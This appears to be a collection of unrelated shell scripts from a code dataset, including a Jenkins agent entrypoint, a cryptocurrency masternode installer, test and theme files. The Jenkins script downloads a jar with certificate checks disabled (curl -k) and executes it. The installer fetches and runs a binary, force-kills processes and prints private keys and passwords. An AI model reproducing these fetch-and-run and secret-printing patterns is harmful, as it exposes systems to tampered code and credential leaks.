# Change directory and execute to install, including minor hacks
# to fix stupid Oracle interactive install process.
echo "[-install-] Executing distribution package ..."
thisdir=`pwd`
cd ${COMPONENT_VERSION_BUILDDIR}
echo "yes" > answers.txt
./${distfile} < ./answers.txt > /dev/null
cd ${thisdir}
#
# Move unpacked distribution to become component home directory.
echo "[-install-] Moving to component home directory ..."
mkdir -p ${COMPONENT_INSTALLDIR}
mv ${COMPONENT_VERSION_BUILDDIR}/${unpacksto} ${COMPONENT_HOME}
#
# Add in local jtool library for service monitoring.
echo "[-install-] Adding in local jtool library ..."
mkdir -p ${COMPONENT_HOME}/local
cp ${INSTALLER_COMPONENT_VERSIONDIR}/${jtooljar} ${COMPONENT_HOME}/local/jtool.jar
#
# Add component configuration.
echo "[-install-] Adding component configuration ..."
mkdir -p ${COMPONENT_CONFIG}
process_template ${INSTALLER_COMPONENT_PROFILE_TMPL} > ${COMPONENT_PROFILE}
# Add component base.
echo "[-install-] Adding component base structure ..."
mkdir -p ${COMPONENT_BASE}
mkdir -p ${COMPONENT_LOGS}
| true |
77fc09870e9196b04762ff80024438c96ddd9017
|
Shell
|
adalisan/vsi_common
|
/tests/test-relpath.bsh
|
UTF-8
| 5,228 | 2.921875 | 3 |
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
. "$(dirname "${BASH_SOURCE[0]}")/testlib.bsh"
VSI_COMMON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.."; pwd)"
relpath_check()
{
# echo "python -c 'import os.path as o;print(o.relpath(\"$1\", \"$2\"))'"
# python -c "import os.path as o;print(o.relpath('$1', '$2'))"
# perl -e "use File::Spec; print File::Spec->abs2rel('${1}','${2}');"; echo
# echo "$(relpath "${1}" "${2}")"
[ "$(relpath "${1}" "${2}")" == "${3}" ]
[ "$(relpath "${1}/" "${2}")" == "${3}" ]
[ "$(relpath "${1}" "${2}/")" == "${3}" ]
[ "$(relpath "${1}/" "${2}/")" == "${3}" ]
}
common_relpath_test()
{
relpath_check '/ a b/å/⮀*/!' '/ a b/å/⮀/xäå/?' '../../../⮀*/!'
relpath_check '/' '/A' '..'
relpath_check '/A' '/' 'A'
relpath_check '/ & / !/*/\\/E' '/' ' & / !/*/\\/E'
relpath_check '/' '/ & / !/*/\\/E' '../../../../..'
relpath_check '/ & / !/*/\\/E' '/ & / !/?/\\/E/F' '../../../../*/\\/E'
relpath_check '/X/Y' '/ & / !/C/\\/E/F' '../../../../../../X/Y'
relpath_check '/ & / !/C' '/A' '../ & / !/C'
relpath_check '/A / !/C' '/A /B' '../ !/C'
relpath_check '/Â/ !/C' '/Â/ !/C' '.'
relpath_check '/ & /B / C' '/ & /B / C/D' '..'
relpath_check '/ & / !/C' '/ & / !/C/\\/Ê' '../..'
relpath_check '/Å/ !/C' '/Å/ !/D' '../C'
relpath_check '/.A /*B/C' '/.A /*B/\\/E' '../../C'
relpath_check '/ & / !/C' '/ & /D' '../ !/C'
relpath_check '/ & / !/C' '/ & /\\/E' '../../ !/C'
relpath_check '/ & / !/C' '/\\/E/F' '../../../ & / !/C'
relpath_check /home/part1/part2 /home/part1/part3 '../part2'
relpath_check /home/part1/part2 /home/part4/part5 '../../part1/part2'
relpath_check /home/part1/part2 /work/part6/part7 '../../../home/part1/part2'
relpath_check /home/part1 /work/part1/part2/part3/part4 '../../../../../home/part1'
relpath_check /home /work/part2/part3 '../../../home'
relpath_check / /work/part2/part3/part4 '../../../..'
relpath_check /home/part1/part2 /home/part1/part2/part3/part4 '../..'
relpath_check /home/part1/part2 /home/part1/part2/part3 '..'
relpath_check /home/part1/part2 /home/part1/part2 '.'
relpath_check /home/part1/part2 /home/part1 'part2'
relpath_check /home/part1/part2 /home 'part1/part2'
relpath_check /home/part1/part2 / 'home/part1/part2'
relpath_check /home/part1/part2 /work '../home/part1/part2'
relpath_check /home/part1/part2 /work/part1 '../../home/part1/part2'
relpath_check /home/part1/part2 /work/part1/part2 '../../../home/part1/part2'
relpath_check /home/part1/part2 /work/part1/part2/part3 '../../../../home/part1/part2'
relpath_check /home/part1/part2 /work/part1/part2/part3/part4 '../../../../../home/part1/part2'
relpath_check home/part1/part2 home/part1/part3 '../part2'
relpath_check home/part1/part2 home/part4/part5 '../../part1/part2'
relpath_check home/part1/part2 work/part6/part7 '../../../home/part1/part2'
relpath_check home/part1 work/part1/part2/part3/part4 '../../../../../home/part1'
relpath_check home work/part2/part3 '../../../home'
relpath_check . work/part2/part3 '../../..'
relpath_check home/part1/part2 home/part1/part2/part3/part4 '../..'
relpath_check home/part1/part2 home/part1/part2/part3 '..'
relpath_check home/part1/part2 home/part1/part2 '.'
relpath_check home/part1/part2 home/part1 'part2'
relpath_check home/part1/part2 home 'part1/part2'
relpath_check home/part1/part2 . 'home/part1/part2'
relpath_check home/part1/part2 work '../home/part1/part2'
relpath_check home/part1/part2 work/part1 '../../home/part1/part2'
relpath_check home/part1/part2 work/part1/part2 '../../../home/part1/part2'
relpath_check home/part1/part2 work/part1/part2/part3 '../../../../home/part1/part2'
relpath_check home/part1/part2 work/part1/part2/part3/part4 '../../../../../home/part1/part2'
}
begin_test "relpath function"
(
setup_test
. "${VSI_COMMON_DIR}/linux/relpath"
[ "$(type -t relpath)" = "function" ]
common_relpath_test
)
end_test
begin_test "relpath CLI"
(
setup_test
[ "$(type -t relpath)" = "file" ]
relpath_check home/part1/part2 work/part1/part2 '../../../home/part1/part2'
)
end_test
| true |
f3591c8b9a83f79cc6721ae49b28256fb1f8589d
|
Shell
|
hedonproject/Masternode-Installer
|
/script.sh
|
UTF-8
| 4,033 | 3.40625 | 3 |
[] |
no_license
|
#!/bin/bash
INFO='\033[0;36m'
ERROR='\033[0;31m'
SUCCESS='\033[0;32m'
DEFAULT='\033[0m'
printf "${INFO}==================================================================\n"
printf " Hedon Masternode Installer\n"
printf "==================================================================${DEFAULT}\n"
printf "${SUCCESS}Choose your Masternode name:${DEFAULT}\n"
read NODENAME
printf "${SUCCESS}Enter your Masternode Private key${DEFAULT}\n"
read NODEKEY
until [ ${#NODEKEY} -ge 51 ] && [ ! ${#NODEKEY} -ge 52 ]; do
printf "${ERROR}Double check your Masternode Private key and try again:${DEFAULT}\n"
read NODEKEY
done
printf "${SUCCESS}Enter your Masternode Transaction ID:${DEFAULT}\n"
read NODETX
until [ ${#NODETX} -ge 64 ] && [ ! ${#NODETX} -ge 65 ]; do
printf "${ERROR}Double check your Masternode Transaction ID and try again:${DEFAULT}\n"
read NODETX
done
printf "${SUCCESS}Please enter your Masternode Transaction Index:${DEFAULT}\n"
read NODETXI
until [[ "$NODETXI" =~ ^[0-9]+$ ]]; do
printf "${ERROR}Double check your Masternode Transaction Index and try again:${DEFAULT}\n"
read NODETXI
done
printf "${SUCCESS}Installing packages and updates${DEFAULT}\n"
sudo apt-get update
sudo add-apt-repository ppa:bitcoin/bitcoin -y
sudo apt-get update
sudo apt-get install ufw -y
sudo apt-get install git -y
sudo apt-get install nano -y
sudo apt-get install pwgen -y
sudo apt-get install dnsutils -y
sudo apt-get install zip unzip -y
sudo apt-get install libzmq3-dev -y
sudo apt-get install libboost-all-dev -y
sudo apt-get install libminiupnpc-dev -y
sudo apt-get install build-essential libssl-dev libminiupnpc-dev libevent-dev -y
sudo apt-get install libdb4.8-dev libdb4.8++-dev -y
PORT="5404"
PASS=$(pwgen -1 20 -n)
VPSIP=$(dig +short myip.opendns.com @resolver1.opendns.com)
printf "${SUCCESS}Setting up locales${DEFAULT}\n"
export LANG="en_US.utf8"
export LANGUAGE="en_US.utf8"
export LC_ALL="en_US.utf8"
printf "${SUCCESS}Checking for old Hedon files${DEFAULT}\n"
cd ~/
if pgrep -x "hedond" > /dev/null
then
printf "${ERROR}Killing old Hedon process${DEFAULT}\n"
kill -9 $(pgrep hedond)
fi
if [ -d "Daemon" ]; then
rm -r Daemon
printf "${ERROR}Removed old Hedon core${DEFAULT}\n"
fi
if [ -d ".hedoncore" ]; then
rm -r .hedoncore
printf "${ERROR}Removed old Hedon data${DEFAULT}\n"
fi
printf "${SUCCESS}Downloading and setting up a new wallet instance${DEFAULT}\n"
cd ~/
wget "https://github.com/hedonproject/Hedon/releases/download/1.0.1.1/hedon-v1.0.1.1-daemon.zip"
unzip ~/hedon-v1.0.1.1-daemon.zip
rm -r ~/hedon-v1.0.1.1-daemon.zip
cd Daemon
chmod ugo+x hedond
chmod ugo+x hedon-cli
chmod ugo+x hedon-tx
printf "${SUCCESS}Setting up ${NODENAME}${DEFAULT}\n"
mkdir ~/.hedoncore
cat <<EOF > ~/.hedoncore/hedon.conf
rpcuser=Hedon
rpcpassword=${PASS}
rpcallowip=127.0.0.1
#----------------------------
listen=1
server=1
daemon=1
maxconnections=64
#----------------------------
masternode=1
masternodeprivkey=${NODEKEY}
externalip=${VPSIP}
EOF
printf "${SUCCESS}Starting up Hedon Daemon${DEFAULT}\n"
sudo ufw allow 5404
sudo ufw allow 5405
~/Daemon/hedond
printf "${SUCCESS}==================================================================${DEFAULT}\n"
printf "${SUCCESS}Paste the following line into masternode.conf of your desktop wallet:${DEFAULT}\n\n"
printf "${ERROR}${NODENAME} ${VPSIP}:${PORT} ${NODEKEY} ${NODETX} ${NODETXI}${DEFAULT}\n\n"
printf "${SUCCESS}Installed with VPS IP ${ERROR}${VPSIP}${SUCCESS} on port ${ERROR}${PORT}${DEFAULT}\n"
printf "${SUCCESS}Installed with Masternode Key ${ERROR}${MNKEY}${DEFAULT}\n"
printf "${SUCCESS}Installed with Masternode TXID ${ERROR}${MNTX}${SUCCESS} index ${ERROR}${MNTXI}${DEFAULT}\n"
printf "${SUCCESS}Installed with RPCUser=${ERROR}Hedon${DEFAULT}\n"
printf "${SUCCESS}Installed with RPCPassword=${ERROR}${PASS}${DEFAULT}\n"
printf "${SUCCESS}==================================================================${DEFAULT}\n"
| true |
94b18d9799bfa8bd7c138f65da5b61d19bcfbb62
|
Shell
|
amire80/cxscripts
|
/count_deletion_range.sh
|
UTF-8
| 122 | 3.0625 | 3 |
[
"CC0-1.0"
] |
permissive
|
#!/bin/bash
firstDay=$1
lastDay=$2
for date in $(eval echo "{$firstDay..$lastDay}")
do
./count_deletion.sh $date
done
| true |
27948c163e983a0e6e5102b6d25776e6d1090896
|
Shell
|
seckindinc/ShellScripting
|
/Projects_Back_up
|
UTF-8
| 188 | 2.625 | 3 |
[] |
no_license
|
#!/bin/bash
TIME=`date +%b-%d-%y`
FILENAME=backup-$TIME.tar.gz
SRCDIR=/home/seckindinc/Desktop/Projects
DESDIR=/home/seckindinc/Backup/Projects-Backup
tar -cpzf $DESDIR/$FILENAME $SRCDIR
| true |
07072e0472ba8155061c56ba5fd767014710bd1c
|
Shell
|
RitikaTanwani/College_Documents
|
/Documents/1st yr/05-shell_scripting-examples/scripts/ls.sh
|
UTF-8
| 72 | 2.515625 | 3 |
[] |
no_license
|
#! /bin/bash
lsout=`ls -l`
for i in $lsout
do
echo $i" foobar"
done
| true |
922ddb6e5bf9b43b4e0786bc77d3a35c7dd72f5a
|
Shell
|
bluemarvin/ascripts
|
/maven.sh
|
UTF-8
| 174 | 2.59375 | 3 |
[] |
no_license
|
#!/bin/bash
TARGET=$1
if [ -z $TARGET ] ; then
TARGET="/Volumes/firefox/vr/obj-arm-linux-androideabi/gradle/build/mobile/android/geckoview"
fi
cd $TARGET && simple-server.sh
| true |
a75d2dbb4e8b88085a44ae1e66e166ad82c0d4b8
|
Shell
|
jorgeborges/dotfiles
|
/oh-my-zsh/themes/jborges.zsh-theme
|
UTF-8
| 1,806 | 3 | 3 |
[
"MIT"
] |
permissive
|
#!/usr/bin/env zsh
#local return_code="%(?..%{$fg[red]%}%? ↵%{$reset_color%})"
# Altera by Jorge Borges
# Use with a dark background and 256-color terminal!
# You can set your computer name in the ~/.box-name file if you want.
# Borrowing shamelessly from these oh-my-zsh themes:
# fino
# bira
# robbyrussell
# muse
# ingo
#
# Also borrowing from http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/
setopt promptsubst
autoload -U add-zsh-hook
function prompt_char {
#git status >/dev/null 2>/dev/null && echo '± ' && return
#hg root >/dev/null 2>/dev/null && echo '☿ ' && return
echo "%{$fg[red]%}❯%{$reset_color%}%{$fg[yellow]%}❯%{$reset_color%}%{$fg[cyan]%}❯%{$reset_color%} "
}
function box_name {
[ -f ~/.box-name ] && cat ~/.box-name || hostname -s
}
local rvm_ruby='‹$(rvm-prompt i v g)›%{$reset_color%}'
local current_dir='${PWD/#$HOME/~}'
local git_info='$(git_prompt_info)'
PROMPT="%{$FG[040]%}%n%{$reset_color%}%{$FG[239]%}@%{$reset_color%}%{$FG[033]%}$(box_name)%{$reset_color%} %{$FG[239]%}in%{$reset_color%} %{$terminfo[bold]$FG[226]%}${current_dir} %{$reset_color%}${git_info}
%F{green}$(prompt_char)%f"
ZSH_THEME_GIT_PROMPT_PREFIX="%{$FG[051]%}\uE0A0:%{$reset_color%} "
ZSH_THEME_GIT_PROMPT_SUFFIX="%{$reset_color%}"
ZSH_THEME_GIT_PROMPT_DIRTY=" %{$fg[red]%}✗%{$reset_color%}"
ZSH_THEME_GIT_PROMPT_CLEAN=" %{$fg[green]%}✔%{$reset_color%}"
ZSH_THEME_GIT_PROMPT_ADDED="%{$fg[082]%}✚%{$reset_color%}a"
ZSH_THEME_GIT_PROMPT_MODIFIED="%{$fg[166]%}✹%{$reset_color%}m"
ZSH_THEME_GIT_PROMPT_DELETED="%{$fg[160]%}✖%{$reset_color%}d"
ZSH_THEME_GIT_PROMPT_RENAMED="%{$fg[220]%}➜%{$reset_color%}r"
ZSH_THEME_GIT_PROMPT_UNMERGED="%{$fg[082]%}═%{$reset_color%}um"
ZSH_THEME_GIT_PROMPT_UNTRACKED="%{$fg[190]%}✭%{$reset_color%}ut"
| true |
2026facec402d0c876afe5bd83a9bfd34e86f1d4
|
Shell
|
Ahebert76/Jamf-Extension-Attributes
|
/Printer Installer Version
|
UTF-8
| 223 | 2.953125 | 3 |
[] |
no_license
|
#!/bin/bash
PrinterInstallerInfo=$(cat /opt/PrinterInstallerClient/VERSION)
if [ ! -z "$PrinterInstallerInfo" ] ; then
echo "<result>$PrinterInstallerInfo</result>"
else
echo "<result>not found</result>"
fi
exit 0
| true |
00586e51b2c7e3941843e8fba32d6826595aa873
|
Shell
|
JoepSchyns/visual_scientific_search
|
/server/data/script.sh
|
UTF-8
| 1,285 | 3.046875 | 3 |
[] |
no_license
|
#!/bin/sh
#find . -name "s2-corpus-*" -print -exec gunzip -k -S ".json" {} /; -exec
#&& gunzip *.gz &&
#find . -name "s2-corpus-*" -print -exec mongoimport --numInsertionWorkers 2 --db search --collection semanticscholar --file {} \; -exec rm {} \;
#find . -name "s2-corpus-*" -print -exec curl -XPOST 'localhost:9200/search/semanticscholar/_bulk?pretty' -T {} \; -exec rm {} \;
#wget -i manifest.txt -B https://s3-us-west-2.amazonaws.com/ai2-s2-research-public/open-corpus/
for f in $(find . -name "*.gz"); do
temp_dir = "./temp";
file_name="$f.json";
gunzip -k "$f" > "$temp_dir/$file_name";
cd temp_dir;
echo $file_name;
split $file_name "$file_name-" -l 5000 -a 3 -d;
for fs in $(find . -name "$file_name-*"); do
echo $fs;
sed 's/^/{"index":{}}\n/' "$fs" > "$fs-i";
echo "$fs-i";
curl -XPOST -H 'Content-Type: application/json' 'localhost:9200/search/semanticscholar/_bulk?pretty' --data-binary "@$fs-i";
done
DATE=`date '+%Y-%m-%d %H:%M:%S'`;
echo "$f $DATE" >> completed.log;
cd ../;
rm -R "$temp_dir";
echo "sample:";
echo curl -H 'Content-Type: application/json' localhost:9200/search/semanticscholar/_search?pretty -d '{"size":1,"query": {"match_all": {}}}';
done
# mv filename temp
# (echo abcdef ; cat temp ; echo ghijkl) > filename
# rm temp
| true |
8663705b5046d095aa418b99abf067df466b31d1
|
Shell
|
alde/setup
|
/scripts/rvm.sh
|
UTF-8
| 423 | 3.46875 | 3 |
[] |
no_license
|
#!/usr/bin/env bash
rvmDir="${HOME}/.rvm"
rubyver="2.5"
info "[ruby] Setting up ruby ${rubyver}"
if [ -d ${rvmDir} ] ; then
notice "[rvm] already installed - skipping"
else
gpg2 --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB
curl -sSL https://get.rvm.io | bash -s stable
source "${HOME}/.rvm/scripts/rvm"
rvm install "${rubyver}"
fi
info "[ruby] done"
| true |
0af7284aefd6d9d9311a6d4ae91fc5066104e11f
|
Shell
|
ant104247/Mastering-Linux-Shell-Scripting-Second-Edition
|
/Chapter06/hello9.sh
|
UTF-8
| 95 | 2.796875 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
echo "You are using $(basename $0)"
for n in $*
do
echo "Hello $n"
done
exit 0
| true |
4465571cb13edc17c3ef06191d4f167f0c6860ea
|
Shell
|
cloutainer/k8s-jenkins-slave-base
|
/docker-entrypoint.sh
|
UTF-8
| 1,848 | 3.453125 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
#
# UMASK
#
umask u+rxw,g+rwx,o-rwx
#
# USER
#
RUNAS=$(whoami)
echo "DOCKER-ENTRYPOINT >> running as user: ${RUNAS}"
#
# IMPORT KUBERNETES ca.crt (OPTIONAL)
#
if [ -n "$KUBERNETES_CA_BASE64" ]
then
echo $KUBERNETES_CA_BASE64 | base64 --decode > /tmp/kube-ca.crt
echo "DOCKER-ENTRYPOINT >> KUBERNETES_CA_BASE64 ENV VAR > importing kubernetes ca certificate to java keystore."
cat /tmp/kube-ca.crt
keytool -importcert -keystore /etc/ssl/certs/java/cacerts -alias kubernetes -file /tmp/kube-ca.crt -storepass changeit -noprompt
else
echo "DOCKER-ENTRYPOINT >> KUBERNETES_CA_BASE64 ENV VAR > not set. SKIPPING importing of kubernetes ca certificate."
fi
#
# ENTRYPOINT-HOOK (CHILD IMAGE)
#
echo "DOCKER-ENTRYPOINT >> starting entrypoint hook"
source /opt/docker-entrypoint-hook.sh
#
# JENKINS SLAVE JNLP
#
echo "DOCKER-ENTRYPOINT >> config: JENKINS_NAME: $JENKINS_NAME"
echo "DOCKER-ENTRYPOINT >> config: JENKINS_SECRET: $JENKINS_SECRET"
echo "DOCKER-ENTRYPOINT >> config: JENKINS_URL: $JENKINS_URL"
echo "DOCKER-ENTRYPOINT >> config: JENKINS_JNLP_URL: $JENKINS_JNLP_URL"
if [ -n "$REMOTING_JAR_URL" ]
then
echo "DOCKER-ENTRYPOINT >> downloading jenkins-slave.jar from USER SPECIFIED URL"
echo "DOCKER-ENTRYPOINT >> ${REMOTING_JAR_URL}"
curl -sSLko /tmp/jenkins-slave.jar $REMOTING_JAR_URL
else
echo "DOCKER-ENTRYPOINT >> downloading jenkins-slave.jar from Jenkins"
echo "DOCKER-ENTRYPOINT >> ${JENKINS_URL}/jnlpJars/slave.jar"
curl -sSLko /tmp/jenkins-slave.jar ${JENKINS_URL}/jnlpJars/slave.jar
fi
echo "DOCKER-ENTRYPOINT >> establishing JNLP connection with Jenkins via JNLP URL"
exec java $JAVA_OPTS -cp /tmp/jenkins-slave.jar \
hudson.remoting.jnlp.Main -headless \
-workDir /home/jenkins/agent/ \
-url $JENKINS_URL $JENKINS_SECRET $JENKINS_NAME
| true |
6a3eb32a266ed6a23a2de71f9ae5f2688d769a42
|
Shell
|
m4r35n357/ODE-Playground
|
/cns-scan
|
UTF-8
| 1,512 | 3.609375 | 4 |
[] |
no_license
|
#!/bin/sh
#
# (c) 2018-2023 [email protected] (Ian Smith), for licencing see the LICENCE file
args="$0 $*"
echo "args: \033[1;37m$(($# + 1))\033[0;37m, [ \033[0;35m$args\033[0;37m ]" >&2
user_dir="/tmp/$USER"
[ ! -d $user_dir ] && mkdir $user_dir
user_data="$user_dir/data"
max=$1
threshold=$2
shift 2
case $4 in
"_") ;;
*) echo '"order" argument should be set to "_"'; exit 1;;
esac
timestep=$5
steps=$6
. ./cns-functions.sh
processed="$(get_precision $*)"
n=2
while [ $n -le $max ]
do
set $processed
begin="$1 $2 $3"
shift 4
current="$begin $n $*"
halfstep $current
$current >$fileB &
wait
temp=$(./divergence $fileA $fileB $threshold)
case $temp in
'') echo $n "Still within tolerance of $threshold - increase simulation time?"
exit 1;;
*) set $temp
echo $n $4 $6;;
esac
n=$((n + 1))
done 2>/dev/null | tee $user_data
max_clean=$(echo "scale=2; $timestep * $steps;" | /usr/bin/bc)
set $(tail -1 $user_data)
max_cpu=$(echo "scale=2; 1.5 * $3;" | /usr/bin/bc)
/usr/bin/gnuplot -p << EOF
set terminal wxt background rgb "grey85"
set title noenhanced '$args'
set key left
set ytics nomirror
set y2tics
set xlabel 'Taylor Series Order'
set ylabel 'Clean Simulation Time, model units'
set y2label 'CPU Time, seconds'
set style fill solid border -1
set xrange [0:]
set yrange [0:'$max_clean']
set y2range [0:'$max_cpu']
plot '$user_data' using 1:2 axes x1y1 title 'CNS' with boxes, '' u 1:3 axes x1y2 t 'CPU' w boxes
EOF
| true |
bbc20069ecad7881902d70c3e8d322a03e7c3e7e
|
Shell
|
feidianbo/origin-server
|
/node/misc/bin/setup_pam_fs_limits.sh
|
UTF-8
| 3,522 | 3.921875 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Sets up the PAM filesystem and quota limits for an OpenShift gear
#
#
# Add a PAM limit set to the user
#
# IN: username
# IN: limits_order
# IN: limits_nproc
#
LIMITSVARS="core data fsize memlock nofile rss stack cpu nproc as maxlogins priority locks sigpending msgqueue nice rprio"
function set_pam_limits {
USERNAME=$1
#assume these come from sourced config file into environment
#LIMITS_ORDER=${2:-$limits_order}
#LIMITS_NPROC=${3:-$limits_nproc}
LIMITSFILE=/etc/security/limits.d/${limits_order}-${USERNAME}.conf
if [ -z "${NOOP}" ]
then
cat <<EOF > ${LIMITSFILE}
# PAM process limits for guest $USERNAME
# see limits.conf(5) for details
#Each line describes a limit for a user in the form:
#
#<domain> <type> <item> <value>
EOF
else
echo "cat <<EOF > ${LIMITSFILE}
# PAM process limits for guest $USERNAME
# see limits.conf(5) for details
#Each line describes a limit for a user in the form:
#
#<domain> <type> <item> <value>
${USERNAME} hard nproc ${LIMITS_NPROC}
EOF"
fi
for KEY in $LIMITSVARS
do
VALUE=`eval echo \\$limits_$KEY`
if [ -n "$VALUE" ]
then
if [ -z "${NOOP}" ]
then
echo "${USERNAME} hard $KEY $VALUE" >> ${LIMITSFILE}
else
echo "echo \"${USERNAME} hard $KEY $VALUE\" >> ${LIMITSFILE}"
fi
fi
done
}
#
# Return the mount point of the file system for a given path
#
function get_mountpoint() {
df -P $1 2>/dev/null | tail -1 | awk '{ print $6 }'
}
# Are quotas enabled on the specified directory?
function quotas_enabled {
# DIR=$1
QUOTA_ROOT=`get_mountpoint $1`
# if you can't find the quota root for the given directory, it's not enabled
if [ -z "${QUOTA_ROOT}" ]
then
return 1
fi
quotaon -u -p $QUOTA_ROOT >/dev/null 2>&1
# quotaon returns the opposite of what you expect
# 1 = enabled, 0 = not enabled
if [ $? -eq 0 ]
then
return 1
else
return 0
fi
}
#
# Set a user's inode and block quotas on the home file system
# usage: set_fs_quota <username> <inodes> <blocks>
function set_fs_quotas {
# USERNAME=$1
# QUOTA_BLOCKS=${2:-$quota_blocks}
# QUOTA_FILES=${3:-$quota_files}
# get the user home directory
# get the quota mount point
if quotas_enabled $GEAR_BASE_DIR
then
setquota $1 0 $2 0 $3 `get_mountpoint $GEAR_BASE_DIR`
else
echo "WARNING: quotas not enabled on $GEAR_BASE_DIR" >&2
fi
}
# ============================================================================
# MAIN
# ============================================================================
# Load defaults and node configuration
source /etc/openshift/node.conf
# defaults
limits_order=84
limits_nproc=100
quota_files=1000
# a block = 1Kbytes: 1k * 1024 * 128
quota_blocks=`expr 1024 \* 128` # 128MB
# Load system configuration
source /etc/openshift/resource_limits.conf
# Allow the command line to override quota and limits
username=$1
quota_blocks_custom=$2
quota_files_custom=$3
nproc_custom=$4
if [ -n "$quota_blocks_custom" ] && [ $quota_blocks_custom -gt $quota_blocks ]
then
quota_blocks=$quota_blocks_custom
fi
if [ -n "$quota_files_custom" ] && [ $quota_files_custom -gt $quota_files ]
then
quota_files=$quota_files_custom
fi
if [ -n "$nproc_custom" ] && [ $nproc_custom -le $limits_nproc ]
then
limits_nproc=$nproc_custom
fi
set_pam_limits $username
set_fs_quotas $username $quota_blocks $quota_files
| true |
0de6a54aff5ff8c45c8082cd03784f6badf1e9cd
|
Shell
|
mitchpaulus/dotfiles
|
/scripts/recent
|
UTF-8
| 165 | 3.140625 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/sh
if [ $# = 0 ]; then
find . -type f -printf '%TY-%Tm-%Td %p\n' | sort -r
else
find . -type f -printf '%TY-%Tm-%Td %p\n' | sort -r | head -n "$1"
fi
| true |
3bf7c3a1fa9a5ef3cb49b9c1d1f2a2fbb9b6de91
|
Shell
|
Joll59/bashprofile
|
/Bash/environment.sh
|
UTF-8
| 3,517 | 3.359375 | 3 |
[] |
no_license
|
# Environment Variables
# =====================
# Editors
# Tells your shell that when a program requires various editors,
export VISUAL="code-insiders"
export SVN_EDITOR="code-insiders"
export GIT_EDITOR="code-insiders"
export EDITOR="code-insiders"
# Library Paths
# These variables tell your shell where they can find certain
# required libraries so other programs can reliably call the variable name
# instead of a hardcoded path.
# NODE_PATH
# Node Path from Homebrew I believe
export NODE_PATH="/usr/local/lib/node_modules:$NODE_PATH"
# Those NODE & Python Paths won't break anything even if you
# don't have NODE or Python installed. Eventually you will and
# then you don't have to update your bash_profile
# GIT_MERGE_AUTO_EDIT
# This variable configures git to not require a message when you merge.
export GIT_MERGE_AUTOEDIT='no'
# Version
# What version of this bash profile this is
export BASH_PROFILE_VERSION='1.5.1'
# Paths
# The USR_PATHS variable will just store all relevant /usr paths for easier usage
# Each path is seperate via a : and we always use absolute paths.
# A bit about the /usr directory
# The /usr directory is a convention from linux that creates a common place to put
# files and executables that the entire system needs access too. It tries to be user
# independent, so whichever user is logged in should have permissions to the /usr directory.
# We call that /usr/local. Within /usr/local, there is a bin directory for actually
# storing the binaries (programs) that our system would want.
# Also, Homebrew adopts this convetion so things installed via Homebrew
# get symlinked into /usr/local
export USR_PATHS="/usr/local:/usr/local/bin:/usr/local/sbin:/usr/bin"
# Hint: You can interpolate a variable into a string by using the $VARIABLE notation as below.
# We build our final PATH by combining the variables defined above
# along with any previous values in the PATH variable.
# Our PATH variable is special and very important. Whenever we type a command into our shell,
# it will try to find that command within a directory that is defined in our PATH.
# Read http://blog.seldomatt.com/blog/2012/10/08/bash-and-the-one-true-path/ for more on that.
export PATH="$USR_PATHS:$PATH"
# If you go into your shell and type: echo $PATH you will see the output of your current path.
# For example, mine is:
#!/bin/bash
# /Users/avi/.rvm/gems/ruby-1.9.3-p392/bin:/Users/avi/.rvm/gems/ruby-1.9.3-p392@global/bin:/Users/avi/.rvm/rubies/ruby-1.9.3-p392/bin:/Users/avi/.rvm/bin:/usr/local:/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/local/mysql/bin:/usr/local/share/python:/bin:/usr/sbin:/sbin:
# Postgres
export PATH=/Applications/Postgres.app/Contents/Versions/latest/bin:$PATH
# Final Configurations and Plugins
# =====================
# Git Bash Completion
# Will activate bash git completion if installed
# via homebrew
if [ -f `brew --prefix`/etc/bash_completion ]; then
. `brew --prefix`/etc/bash_completion
fi
# RVM
# Mandatory loading of RVM into the shell
# This must be the last line of your bash_profile always
# source ~/.profile
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
# [[ -s "$HOME/.profile" ]] && source "$HOME/.profile" # Load the default .profile
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
| true |
3b075746cdf896efccd1428e1c082462f3b73068
|
Shell
|
dgunruh/Si-HJ-MD-DFT
|
/PelotonClusterScripts/OldScripts/lammpsSubmission.sh
|
UTF-8
| 1,239 | 2.640625 | 3 |
[] |
no_license
|
#!/bin/bash -l
# Name of the job
#SBATCH --job-name=cSiaSiMD
# SBATCH --nodes=2
# SBATCH --ntasks=2
#SBATCH --array=0-3
#SBATCH --cpus-per-task=32
#SBATCH --partition=med2
#SBATCH --time=24:00:00
#SBATCH --output='outputs/cSiaSiMD-%j.output'
#SBATCH --mail-user="[email protected]"
#SBATCH --mail-type=END
#SBATCH --mail-type=FAIL
# run one thread for each one the user asks the queue for
# hostname is just for debugging
# hostname
# export OMP_NUM_THREADS=$SLURM_NTASKS
export t=$SLURM_ARRAY_TASK_ID
module load lammps
# the main job executable to run: note the use of srun before it
# srun lmp_serial -in cSiaSi_workingVersion.in
# mpirun lmp_mpi -in cSiaSi_workingVersion.in
# assign the random seed and the output files for the lammps scripts
s=21248+100*$t
dumpA=aSi-$t.xyz
dumpsnapA=aSiBox-$t.xyz
dumpI=cSiaSiInterface-$t.xyz
dumpsnapI=cSiaSiInterfaceSnapshot-$t.xyz
# sed -rie 's/(rand_seed equal)\s\w+/\1 $s/gi' createAmorphousSi.in
# sed -rie 's/(rand_seed equal)\s\w+/\1 $s/gi' mergeAmorphousCrystalline.in
mpirun lmp_mpi -var s $s -var d $dumpA -var ds $dumpsnapA -in createAmorphousSi.in
mpirun lmp_mpi -var s $s -var d $dumpI -var dA $dumpA -var ds $dumpsnapI -in mergeAmorphousCrystalline.in
| true |
8a135ee29e764268aaea5ecf04ff9fb9d477e154
|
Shell
|
pxpeterxu/react-express-scaffolding
|
/sysadmin/components/app-start.sh
|
UTF-8
| 382 | 2.765625 | 3 |
[
